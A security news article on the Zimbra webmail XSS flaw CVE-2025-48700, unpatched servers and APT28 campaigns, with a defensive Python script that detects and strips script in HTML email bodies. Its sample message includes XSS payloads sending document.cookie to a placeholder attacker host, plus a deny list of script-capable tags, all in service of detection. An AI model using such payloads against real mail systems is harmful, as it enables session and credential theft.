
Over 10,000 Zimbra Servers Vulnerable to Ongoing XSS Attacks
Why It Matters
Unpatched Zimbra servers expose sensitive communications to nation‑state actors, raising breach risk for governments and enterprises worldwide. CISA's quick move to list the flaw in its Known Exploited Vulnerabilities catalog underscores the urgency for organizations to treat email‑platform patching as a core cyber‑defense measure rather than routine maintenance.
Key Takeaways
- Over 10,500 Zimbra servers remain exposed and unpatched worldwide
- CVE‑2025‑48700 enables unauthenticated XSS via a malicious email
- CISA added the flaw to its KEV catalog, mandating rapid remediation
- State‑backed APT28 leveraged a separate Zimbra XSS against Ukraine's government
Pulse Analysis
Zimbra Collaboration Suite powers email and collaboration for millions of users, including government agencies and thousands of enterprises. CVE‑2025‑48700 is a cross‑site scripting flaw in the webmail client: an unauthenticated attacker needs only to send a crafted email, and the JavaScript it carries runs in the recipient's browser, inside the recipient's authenticated webmail session, as soon as the message is viewed. Although Synacor released patches in mid‑2025, Shadowserver's scans still find over 10,500 installations reachable on the public internet that have not been updated, which leaves the vulnerability a fertile hunting ground for threat actors. CISA's decision to list the bug in its Known Exploited Vulnerabilities catalog reflects a broader shift toward proactive, government‑driven vulnerability management.
The geographic spread of the unpatched servers, with roughly equal concentrations in Asia and Europe, highlights a global patch‑lag problem. Recent intelligence shows that state‑backed groups such as Russia's APT28 have already weaponized Zimbra XSS bugs in campaigns like Operation GhostMail, targeting Ukrainian ministries by embedding malicious JavaScript directly in email bodies. Because the payload is the message body itself, controls that inspect attachments or rewrite links never see it. The places that can stop it are the webmail renderer, which must sanitize HTML bodies before displaying them, and a strict Content Security Policy on the webmail origin, which refuses inline script even when a sanitizer misses a case. Neither replaces the vendor patch; they limit the damage when the next bypass appears.
For organizations, the lesson is clear: email infrastructure must be treated as a critical attack surface. Immediate actions include inventorying every Zimbra instance and confirming it runs a release that carries Synacor's fix, applying the security updates where it does not, and scanning your own external address space to confirm that no unpatched instance remains reachable from the internet (webmail is meant to be reachable; an unpatched one is not). Beyond patching, a web‑application firewall in front of the webmail proxy, a strict content‑security policy on the webmail interface, and inspection of inbound and stored HTML message bodies for embedded script all narrow the window in which a new XSS can be exploited, though none of them substitutes for the patch. As nation‑state actors continue to exploit legacy email platforms, a disciplined patch‑and‑monitor strategy becomes essential to safeguard sensitive communications and maintain regulatory compliance.
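As an added example (not Zimbra's code and not taken from any advisory), the script below shows the gap the previous two paragraphs describe and one way to close it: it parses a constructed message whose HTML body carries script in three generic forms (a `<script>` element, an `on*` event handler and a `javascript:` URL), shows that an attachment check finds nothing, reports each spot where script could run, and emits a copy with those spots removed. The message, the addresses and the `attacker.invalid` host are constructed for illustration; the payload is a generic one and is not the CVE‑2025‑48700 trigger, which this page does not describe. The allow‑list filter is deliberately minimal: it illustrates the renderer‑side check and the mailbox‑inspection step, and is not a replacement for a maintained HTML sanitizer.

```python
"""Find and strip script in HTML e-mail bodies (added example, not Zimbra code)."""
import html
import re
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample message: one multipart/alternative e-mail whose HTML part
# carries script three ways and has no attachment and no external link.
# Addresses and the attacker.invalid host are placeholders, not real data.
RAW_MESSAGE = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: Invoice 4711
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please review the invoice below.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please review the invoice below.</p>
<img src="https://example.invalid/logo.png" onerror="fetch('https://attacker.invalid/?c='+document.cookie)">
<a href="javascript:alert(document.domain)">Open invoice</a>
<script>new Image().src='https://attacker.invalid/?c='+document.cookie</script>
</body></html>
--b1--
"""

# Elements that can execute or load script, or change how the page resolves
# URLs; a mail body has no legitimate need for any of them.
SCRIPT_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "base", "form", "meta", "link", "style"}
# Attributes whose value is a URL and so could carry javascript: or data:.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "background"}
# Allow-list of URL schemes; anything else (javascript:, data:, vbscript:, ...) is dropped.
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:|#)", re.IGNORECASE)


def html_part(raw: str) -> str:
    """Return the first text/html body of a raw RFC 5322 message, or '' if none."""
    msg = message_from_string(raw)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            return part.get_payload(decode=True).decode(charset, "replace")
    return ""


def has_attachment(raw: str) -> bool:
    """True if any MIME part carries a filename: what an attachment filter keys on."""
    msg = message_from_string(raw)
    return any(part.get_filename() for part in msg.walk())


class ScriptAuditor(HTMLParser):
    """Walks an HTML body, records every place script could run, and rebuilds
    a copy without those places. Unknown tags are kept; only the listed
    script-capable elements, on* handlers and non-allow-listed URLs go."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []
        self._out: list[str] = []
        self._skip = 0  # > 0 while inside a dropped element such as <script>

    def handle_starttag(self, tag, attrs):
        if tag in SCRIPT_TAGS:
            self.findings.append(f"<{tag}> element")
            self._skip += 1
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:  # HTMLParser lowercases tag and attribute names
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and not SAFE_URL.match(value):
                self.findings.append(f"{name}={value!r} on <{tag}>")
            else:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self._out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in SCRIPT_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self._out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:  # text inside a dropped element is dropped with it
            self._out.append(html.escape(data, quote=False))

    def sanitized(self) -> str:
        return "".join(self._out)


def audit(raw: str) -> tuple[list[str], str]:
    """Return (findings, sanitized_html) for the HTML body of a raw message."""
    auditor = ScriptAuditor()
    auditor.feed(html_part(raw))
    auditor.close()
    return auditor.findings, auditor.sanitized()


if __name__ == "__main__":
    print("attachment present:", has_attachment(RAW_MESSAGE))
    findings, clean = audit(RAW_MESSAGE)
    for finding in findings:
        print("FINDING:", finding)
    print(clean)
```

Run over stored mail (for example, the HTML bodies of messages that arrived before the server was patched), `audit` gives a first‑pass answer to the question the article leaves open: whether anyone has already sent script into your users' mailboxes. A non‑empty findings list on a pre‑patch message is worth an incident ticket, not just a cleanup.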